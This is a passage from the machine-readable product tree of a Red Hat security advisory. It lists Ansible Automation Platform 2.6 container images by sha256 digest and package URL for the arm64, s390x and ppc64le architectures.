"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Ac948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3Af0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3A1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Ac7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3Afcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3Ae2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3A9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3A6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3A9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3A960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3Aa952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3Aa816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Ac2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3A3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Acaa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
